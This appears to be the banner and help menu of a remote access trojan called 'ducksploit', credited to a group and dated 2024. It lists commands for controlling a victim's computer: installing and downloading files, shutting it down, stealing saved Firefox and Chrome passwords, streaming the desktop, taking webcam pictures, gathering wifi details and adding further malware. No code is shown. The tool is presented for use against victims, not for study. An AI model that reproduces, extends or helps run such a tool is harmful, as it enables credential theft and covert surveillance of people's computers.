      dP                   dP                         dP          oo   dP   
      88                   88                         88               88   
.d888b88 dP    dP .d8888b. 88  .dP  .d8888b. 88d888b. 88 .d8888b. dP d8888P 
88'  `88 88    88 88'  `"" 88888"   Y8ooooo. 88'  `88 88 88'  `88 88   88   
88.  .88 88.  .88 88.  ... 88  `8b.       88 88.  .88 88 88.  .88 88   88   
`88888P8 `88888P' `88888P' dP   `YP `88888P' 88Y888P' dP `88888P' dP   dP   
                                             88                             
                                             dP                             
credits: 4re5 group - 2024

victim's website: 'http://<victim's ip>'

our team: 'https://4re5group.github.io'

commands:
|    Command     |              Usage               |                  Result                   |
|----------------|----------------------------------|-------------------------------------------|
| help           | help                             | getting the command list                  |
|---------------------------------------- [MOUSE] ----------------------------------------------|
| mouseclick     | mouseclick [right, middle, left] | click the desired mouse button            |
| mousescroll    | mousescroll <int>                | symulate a scrolling with intensity       |
| locatemouse    | locatemouse                      | get current victom's mouse locations      |
|-------------------------------------- [UTILITIES] --------------------------------------------|
| uninstall      | uninstall                        | uninstall ducksploit                      |
| credits        | credits                          | get ducksploits credits                   |
|-------------------------------------- [EXPLOITS] ---------------------------------------------|
| open           | open <app name>                  | open desired app                          |
| install        | install <path to exe/msi file>   | install package on victim's pc            |
| download       | download <url>                   | download file in current url              |
| shutdown       | shutdown                         | shutdown the victim's pc                  |
| reboot         | reboot                           | reboot the victim's pc                    |
| closesession   | closesession                     | close current victim's session            |
| host           | host                             | host file at http://{victim's ip}         |
| network_info   | network_info                     | get the victim's wifi infos               |
|---------------------------------------- [TROLL] ----------------------------------------------|
| skull          | skull                            | open cmd with skull and crossbones        |
| msg            | msg <title> <line1> <line2>      | create alertbox with desired infos        |
| rickroll       | rickroll                         | rockroll your victim ;)                   |
|--------------------------------------- [STEALING] --------------------------------------------|
| steal_pwd      | steal_pwd <firefox/google>       | get all victim's browser saved passwords  |
|----------------------------------------- [SPY] -----------------------------------------------|
| desktop_stream | desktop_stream <start/stop>      | stream in real time victim's desktop      |
| screenshot     | screenshot                       | take screenshot                           |
| webcam_snap    | webcam_snap                      | take webcam picture                       |
| info           | info                             | get all stored victim's infos             |
|----------------------------------------- [EVIL] ----------------------------------------------|
| malware        | malware <malware name>           | add malware to vour victim                |
|                |                                  | (ds malware --help)                       |
|----------------|----------------------------------|-------------------------------------------|
